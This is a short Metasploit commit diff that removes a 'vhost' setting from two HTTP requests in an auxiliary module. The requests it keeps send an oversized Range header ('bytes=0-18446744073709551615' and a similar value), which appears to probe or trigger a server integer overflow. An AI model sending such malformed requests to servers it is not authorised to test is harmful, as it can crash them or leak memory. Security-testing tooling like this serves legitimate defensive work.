No "vhost"

bug/bundler_fix
sinn3r 2015-04-15 13:32:11 -05:00
parent 3aa8e6908d
commit 90ed6ee0b6
1 changed files with 0 additions and 2 deletions

View File

@ -67,7 +67,6 @@ class Metasploit3 < Msf::Auxiliary
req = cli.request_raw({
'uri' => uri,
'method' => 'GET',
'vhost' => 'stuff',
'headers' => {
'Range' => 'bytes=18-18446744073709551615'
}
@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_raw({
'uri' => uri,
'method' => 'GET',
'vhost' => 'stuff',
'headers' => {
'Range' => 'bytes=0-18446744073709551615'
}